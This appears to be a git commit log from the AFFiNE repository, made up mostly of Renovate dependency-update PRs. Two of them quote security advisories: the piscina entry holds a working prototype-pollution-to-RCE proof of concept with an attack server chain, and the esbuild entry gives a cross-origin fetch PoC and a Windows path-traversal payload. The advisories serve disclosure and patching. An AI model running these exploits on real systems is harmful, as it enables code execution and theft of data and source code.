- fix(fixRequestBody): harden form-data stringification by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1259](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1259)
- chore(package.json): v3.0.7 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1261](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1261)

**Full Changelog**:
<https://github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7>

###
[`v3.0.6`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.6)

[Compare
Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6)

#### What's Changed

- fix(types): fix Logger type by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1104](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1104)
- fix(fixRequestBody): support text/plain by
[@&#8203;knudtty](https://redirect.github.com/knudtty) in
[#&#8203;1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103)
- chore(examples): bump deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1105](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1105)
- build(prettier): improve prettier setup by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1108](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1108)
- chore(deps): fix punycode node deprecation warning by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1109](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1109)
- chore(examples): bump deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1110](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1110)
- build(codespaces): add devcontainer.json by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1112](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1112)
- chore(package): bump dev dependencies by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1116](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1116)
- ci(github-action): ci.yml add node v24 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1117](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1117)
- chore(package): bump dev dependencies by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1118](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1118)
- chore(package): upgrade to jest v30 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1122](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1122)
- chore(examples): upgrade deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1124](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1124)
- chore(package): update dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1125](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1125)
- test(websocket): fix ws import by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1126](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1126)
- chore(refactor): use `node:` protocol imports by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1127](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1127)
- ci(node24): pin node24 due to TLS issue with mockttp by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1137](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1137)
- docs(recipes/pathRewrite.md): fix comment by
[@&#8203;DEBargha2004](https://redirect.github.com/DEBargha2004) in
[#&#8203;1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135)
- chore(package): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1138](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1138)
- chore(deps): update actions/checkout action to v5 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1140](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1140)
- fix(error-response-plugin): sanitize input by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1141](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1141)
- chore(package.json): update dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1143](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1143)
- chore: add context7.json by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1144](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1144)
- build(eslint): update eslint.config.mjs by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1145](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1145)
- ci(github workflow): harden github workflows by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1146](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1146)
- chore(package): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1147](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1147)
- ci(ci.yml): unpin node 24 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1148](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1148)
- docs(recipes): fix servers.md http.createServer example by
[@&#8203;hacklschorsch](https://redirect.github.com/hacklschorsch) in
[#&#8203;1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150)
- ci: publish with oidc by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1152](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1152)
- chore(package.json): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1153](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1153)
- chore(package.json): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1155](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1155)
- chore(package.json): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1158](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1158)
- test(types.spec.ts): add type check when req or res are 'any' by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1161](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1161)
- chore(package.json): bump deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1164](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1164)
- chore(package.json): eslint v10 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1165](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1165)
- chore(package.json): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1166](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1166)
- chore(package.json): bump dev-deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1171](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1171)
- docs(examples): fix websocket example by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1170](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1170)
- build(vscode): use workspace version of TypeScript by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1173](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1173)
- fix(router): harden proxy-table matching by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1254](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1254)
- chore(package.json): v3.0.6 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1256](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1256)

#### New Contributors

- [@&#8203;knudtty](https://redirect.github.com/knudtty) made their
first contribution in
[#&#8203;1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103)
- [@&#8203;DEBargha2004](https://redirect.github.com/DEBargha2004) made
their first contribution in
[#&#8203;1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135)
- [@&#8203;hacklschorsch](https://redirect.github.com/hacklschorsch)
made their first contribution in
[#&#8203;1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150)

**Full Changelog**:
<https://github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-19 12:18:31 +08:00
renovate[bot] 9a9f243966 chore: bump up piscina version to v5.2.0 [SECURITY] (#15132)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [piscina](https://redirect.github.com/piscinajs/piscina) | [`5.1.4` →
`5.2.0`](https://renovatebot.com/diffs/npm/piscina/5.1.4/5.2.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/piscina/5.2.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/piscina/5.1.4/5.2.0?slim=true)
|

---

### piscina: Prototype Pollution Gadget → RCE via inherited
options.filename
[CVE-2026-55388](https://nvd.nist.gov/vuln/detail/CVE-2026-55388) /
[GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg)

<details>
<summary>More information</summary>

#### Details
##### Summary

`piscina`'s constructor and `run()` paths read the `filename` option via
plain member access:

```js
// dist/index.js line 92 (constructor)
const filename = options.filename
  ? (0, common_1.maybeFileURLToPath)(options.filename)
  : null;
this.options = { ...kDefaultOptions, ...options, filename, maxQueue: 0 };

// dist/index.js line 616 (run())
run(task, options = kDefaultRunOptions) {
    if (options === null || typeof options !== 'object') {
        return Promise.reject(new TypeError('options must be an object'));
    }
    const { transferList, filename, name, signal } = options;
```

Both reads fall through the prototype chain when the caller's options
object doesn't have `filename` as an own property. When
`Object.prototype.filename` is polluted upstream — by any of the
well-documented PP-source CVEs (lodash<4.17.13, qs<6.10.3,
set-value<4.1.0, minimist<1.2.6, deepmerge<4.2.2, and others) — the
inherited value flows to `worker_threads.Worker` import and the
attacker's `.mjs` runs in the worker.

**Subtlety**: calling `pool.run(task)` with no second arg uses
`kDefaultRunOptions` which has `filename: null` as an OWN property —
that path DOES NOT fire. The vulnerable shape is when the caller passes
their own options object (commonly `{signal: ac.signal}` for abort
support, `{name: ...}` for task labelling, etc.). These caller-built
options objects inherit from `Object.prototype` unless the caller
explicitly uses `Object.create(null)`.

##### Impact

Two preconditions:

1. **Upstream PP-source** somewhere in the process — common in
transitive deps
2. **Attacker-controllable `.mjs`** at a known filesystem path —
realistic via upload endpoints, /tmp races, predictable node_modules
paths, or supply-chain

Once both fire:
- Every `pool.run(task, opts)` call across the entire process is
hijacked
- Attacker's exported function is called with the legitimate caller's
task data — **attacker reads per-request app data**
- Attacker controls the return value — caller receives
`worker_response.by = "ATTACKER-WORKER"` and any other attacker-supplied
response fields — **attacker can poison return values to legitimate
clients**
- Hijack persists until process restart

Strictly worse than the analogous pino chain because piscina actually
*invokes* the attacker function with caller data on every dispatch (pino
imports the attacker module once and errors out).

##### Affected versions

Empirically verified vulnerable on `piscina@5.1.4` (latest stable at
time of disclosure). The bug shape is in the constructor's
`options.filename` read at line 92 of `dist/index.js`, present since the
worker-pool API stabilized — likely all 3.x / 4.x / 5.x affected.

##### Proof of concept

##### A) Minimal in-process PoC

```js
import fs from 'fs';

// 1) Drop the attacker module (any path the victim process can read)
fs.writeFileSync('/tmp/atk.mjs', `
  import fs from 'fs';
  fs.writeFileSync('/tmp/PISCINA_RCE_SENTINEL', JSON.stringify({
    rce: 'CONFIRMED', pid: process.pid, argv1: process.argv[1],
  }));
  export default function(arg) { return 'attacker-return-' + JSON.stringify(arg); }
`);

// 2) Upstream PP-source — pollute Object.prototype.filename
//    (representative of CVE-2019-10744 lodash<4.17.13, CVE-2022-24999 qs<6.10.3,
//     and ~30 historical PP-source CVEs)
const payload = JSON.parse('{"__proto__":{"filename":"/tmp/atk.mjs"}}');
function vulnMerge(t, s) {
  for (const k of Object.keys(s)) {
    if (s[k] !== null && typeof s[k] === 'object') {
      if (!t[k]) t[k] = {};
      vulnMerge(t[k], s[k]);
    } else t[k] = s[k];
  }
}
vulnMerge({}, payload);

// 3) Piscina with empty options inherits the polluted filename
const { Piscina } = await import('piscina');
const p = new Piscina({});                        // inherits filename
const result = await p.run({});                   // worker imports /tmp/atk.mjs
await p.destroy();

// 4) sentinel exists; attacker fn was called with task data
console.log(fs.readFileSync('/tmp/PISCINA_RCE_SENTINEL', 'utf8'));
console.log('attacker fn returned:', result);
// → "attacker-return-{}"
```

##### B) Full-stack HTTP chain (this is the realistic shape)

A correctly-initialized pool gets hijacked by attacker activity. Pool is
created at server boot with a legitimate worker, then per-request
handlers call `pool.run(req.body, {signal: ac.signal})` — the standard
abort-aware shape.

```js
// === server.mjs ===
import express from 'express';
import { Piscina } from 'piscina';

// Vulnerable PP-source middleware (lodash<4.17.13 equivalent)
function vulnMerge(t, s) {
  for (const k of Object.keys(s)) {
    if (s[k] !== null && typeof s[k] === 'object') {
      if (!t[k]) t[k] = {};
      vulnMerge(t[k], s[k]);
    } else t[k] = s[k];
  }
}

// CORRECT pool init at boot
const pool = new Piscina({
  filename: './valid-worker.mjs',
  minThreads: 1, maxThreads: 2,
});

const config = {};
const app = express();

app.post('/api/settings', express.json(), (req, res) => {
  vulnMerge(config, req.body);                    // PP source
  res.json({ ok: true });
});

app.post('/api/process', express.json(), async (req, res) => {
  const ac = new AbortController();
  const result = await pool.run(req.body, { signal: ac.signal });  // <-- hijacked
  res.json({ ok: true, worker_response: result });
});

app.listen(7755);

// === Attacker, 3 HTTP requests ===
// POST /upload  → drops /tmp/atk.mjs
// POST /api/settings with body: {"__proto__":{"filename":"/tmp/atk.mjs"}}
// POST /api/process → pool.run() destructures filename via prototype
//                  → worker imports /tmp/atk.mjs
//                  → attacker fn called with req.body of THIS request
//                  → caller receives attacker-shaped response
```

Empirical observation on `piscina@5.1.4` + Node 23.11.0:
- Pre-attack `/api/process` returns `{by: 'valid-worker'}`
- Cold-path `/probe` after PP source confirms `({}).filename` is
polluted process-wide
- Post-attack `/api/process` returns `{by: 'ATTACKER-WORKER', processed:
<caller's exfil data>}`
- Sentinel file written from inside `piscina/dist/worker.js` with the
worker process's uid + env access

##### Recommended fix

Minimal — own-property guard at both option-read sites:

```js
// constructor (line 92)
const userFilename = Object.prototype.hasOwnProperty.call(options, 'filename')
  ? options.filename
  : null;
const filename = userFilename
  ? (0, common_1.maybeFileURLToPath)(userFilename)
  : null;

// run() (line 616)
const safeOpts = Object.create(null);
Object.assign(safeOpts, options);          // copies own props only? — keeps shape
const { transferList, filename, name, signal } = safeOpts;
```

More idiomatic — use a null-prototype working object throughout
`this.options`:

```js
const safeOpts = Object.create(null);
Object.assign(safeOpts, kDefaultOptions, options);
this.options = safeOpts;
this.options.filename = safeOpts.filename
  ? (0, common_1.maybeFileURLToPath)(safeOpts.filename)
  : null;
this.options.maxQueue = 0;
```

Either approach closes the gadget without breaking any legitimate caller
pattern.

The pattern is the same as recommended for axios CVE-2026-44494 and the
pino PSA filed earlier today. Cross-fix consideration: any other library
you maintain that uses similar `options.X` member-access for worker /
child-process / module-load operations is worth a quick audit.

##### Coordination

- Same maintainer as pino — you're already in security-triage mode for
that PSA. Happy to coordinate timing / disclosure dates across both.
- Will not share publicly until GHSA published or 90 days.
- Please credit `ridingsa` if you choose to credit a reporter.

##### How this was discovered

Generalized the pino disclosure's mechanism — any library that reads a
string option via plain member access and dynamic-loads it (via
`import()` / `require()` / `new Worker()`) is a candidate. Ran a sweep
across 10 candidate libraries; piscina + fastify (via pino propagation)
fired. Piscina is independently vulnerable through its own option-read
sites, hence this separate disclosure.

#### Severity
- CVSS Score: 8.1 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H`

#### References
-
[https://github.com/piscinajs/piscina/security/advisories/GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/piscinajs/piscina/security/advisories/GHSA-x9g3-xrwr-cwfg)
-
[https://github.com/advisories/GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>piscinajs/piscina (piscina)</summary>

###
[`v5.2.0`](https://redirect.github.com/piscinajs/piscina/compare/v5.1.4...v5.2.0)

[Compare
Source](https://redirect.github.com/piscinajs/piscina/compare/v5.1.4...v5.2.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-19 12:18:17 +08:00
Tines Valen e2624d93c7 fix(core): filters emojipicker on label in addition to tags (#15129)
Fixes #15116 
# Issue
Emojipicker keyword filtering only filtered on `tags`, and not `label`.
So searching for an emoji's name would not result in said emoji ending
up in the result. E.G. searching "sunflower" does not make 🌻 appear

# Solution
Adding an extra condition to the filter function to check if the keyword
is a substring of an emoji's label

# Result
Search results now include emojis with that `label`

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Improved emoji picker search to include matches on both emoji labels
and tags (case-insensitive), enabling broader search results for better
discoverability.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-18 22:07:27 +08:00
renovate[bot] 766219d4e1 chore: bump up nestjs to v11.1.27 (#15130)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/common](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common))
| [`11.1.24` →
`11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.24/11.1.27)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.27?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.24/11.1.27?slim=true)
|
| [@nestjs/core](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core))
| [`11.1.24` →
`11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.24/11.1.27)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.27?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.24/11.1.27?slim=true)
|
| [@nestjs/platform-express](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express))
| [`11.1.24` →
`11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.24/11.1.27)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.27?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.24/11.1.27?slim=true)
|
| [@nestjs/platform-socket.io](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io))
| [`11.1.24` →
`11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.24/11.1.27)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.27?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.24/11.1.27?slim=true)
|
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets))
| [`11.1.24` →
`11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.24/11.1.27)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.27?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.24/11.1.27?slim=true)
|

---

> [!WARNING]
> Some dependencies could not be looked up. Check the [Dependency
Dashboard](../issues/5188) for more information.

---

### Release Notes

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

###
[`v11.1.27`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.27)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.26...v11.1.27)

#### What's Changed

- fix(core): sse async handlers teardown issue by
[@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in
[#&#8203;17131](https://redirect.github.com/nestjs/nest/pull/17131)
- fix(platform-fastify): forRoutes middleware ending slash by
[@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in
[#&#8203;17138](https://redirect.github.com/nestjs/nest/pull/17138)

**Full Changelog**:
<https://github.com/nestjs/nest/compare/v11.1.26...v11.1.27>

###
[`v11.1.26`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.26)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.25...v11.1.26)

#### What's Changed

- fix(core): post sse endpoint empty response
[#&#8203;17098](https://redirect.github.com/nestjs/nest/issues/17098) by
[@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in
[#&#8203;17099](https://redirect.github.com/nestjs/nest/pull/17099)

**Full Changelog**:
<https://github.com/nestjs/nest/compare/v11.1.25...v11.1.26>

###
[`v11.1.25`](https://redirect.github.com/nestjs/nest/compare/v11.1.24...02f804159841a2771755c382832a7938b904c420)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.24...v11.1.25)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMTkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIxOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-18 22:06:24 +08:00
renovate[bot] 01d7ef88e3 chore: bump up esbuild version to ^0.28.0 [SECURITY] (#15128)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [esbuild](https://redirect.github.com/evanw/esbuild) | [`^0.25.12` →
`^0.28.0`](https://renovatebot.com/diffs/npm/esbuild/0.25.12/0.28.1) |
![age](https://developer.mend.io/api/mc/badges/age/npm/esbuild/0.28.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/esbuild/0.25.12/0.28.1?slim=true)
|

---

> [!WARNING]
> Some dependencies could not be looked up. Check the [Dependency
Dashboard](../issues/5188) for more information.

---

### esbuild enables any website to send any requests to the development
server and read the response

[GHSA-67mh-4wv8-2f99](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99)

<details>
<summary>More information</summary>

#### Details
##### Summary

esbuild allows any websites to send any request to the development
server and read the response due to default CORS settings.

##### Details

esbuild sets `Access-Control-Allow-Origin: *` header to all requests,
including the SSE connection, which allows any websites to send any
request to the development server and read the response.


https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121

https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363

**Attack scenario**:

1. The attacker serves a malicious web page
(`http://malicious.example.com`).
1. The user accesses the malicious web page.
1. The attacker sends a `fetch('http://127.0.0.1:8000/main.js')` request
by JS in that malicious web page. This request is normally blocked by
same-origin policy, but that's not the case for the reasons above.
1. The attacker gets the content of `http://127.0.0.1:8000/main.js`.

In this scenario, I assumed that the attacker knows the URL of the
bundle output file name. But the attacker can also get that information
by

- Fetching `/index.html`: normally you have a script tag here
- Fetching `/assets`: it's common to have a `assets` directory when you
have JS files and CSS files in a different directory and the directory
listing feature tells the attacker the list of files
- Connecting `/esbuild` SSE endpoint: the SSE endpoint sends the URL
path of the changed files when the file is changed (`new
EventSource('/esbuild').addEventListener('change', e =>
console.log(e.type, e.data))`)
- Fetching URLs in the known file: once the attacker knows one file, the
attacker can know the URLs imported from that file

The scenario above fetches the compiled content, but if the victim has
the source map option enabled, the attacker can also get the
non-compiled content by fetching the source map file.

##### PoC

1. Download
[reproduction.zip](https://redirect.github.com/user-attachments/files/18561484/reproduction.zip)
2. Extract it and move to that directory
1. Run `npm i`
1. Run `npm run watch`
1. Run `fetch('http://127.0.0.1:8000/app.js').then(r =>
r.text()).then(content => console.log(content))` in a different
website's dev tools.


![image](https://redirect.github.com/user-attachments/assets/08fc2e4d-e1ec-44ca-b0ea-78a73c3c40e9)

##### Impact

Users using the serve feature may get the source code stolen by
malicious websites.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N`

#### References
-
[https://github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99)
-
[https://github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d](https://redirect.github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d)
-
[https://github.com/advisories/GHSA-67mh-4wv8-2f99](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### esbuild allows arbitrary file read when running the development
server on Windows

[GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr)

<details>
<summary>More information</summary>

#### Details
##### Summary

The development server contains a path traversal vulnerability on
Windows when serving files from `servedir`.

Due to the use of `path.Clean()` (which only normalizes forward-slash
`/` separators) instead of a Windows-aware path normalization function,
it is possible to craft requests using backslashes (`\`) that bypass the
intended directory containment logic. An attacker can escape the
configured `servedir` root and access arbitrary files on the filesystem.
This issue affects Windows environments only.

##### Details

The request path is sanitized using:
```go
// https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165
queryPath := path.Clean(req.URL.Path)[1:]
```

However:
- `path.Clean()` is POSIX-style and only understands `/` (docs:
`https://pkg.go.dev/path#Clean`)
- On Windows, `\` is a valid path separator
- `path.Clean()` does not treat `\` as a separator

Later, the server constructs the absolute path:
```go
// https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L221
absPath := h.fs.Join(h.servedir, queryPath)
```

If `queryPath` contains sequences such as:
```
..\..\..\..\..\..\..\Windows\system.ini
```

`path.Clean()` will not normalize them, but the Windows filesystem will
interpret `\` as directory separators when resolving `absPath`.
Because the implementation does not verify that the final resolved path
remains within `servedir`, it allows directory traversal outside the
intended root directory.

##### Vulnerable Code

```go
// https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165
	queryPath := path.Clean(req.URL.Path)[1:]
	....
	// Check for a file in the "servedir" directory
	if h.servedir != "" && kind != fs.FileEntry {
		absPath := h.fs.Join(h.servedir, queryPath)
		if absDir := h.fs.Dir(absPath); absDir != absPath {
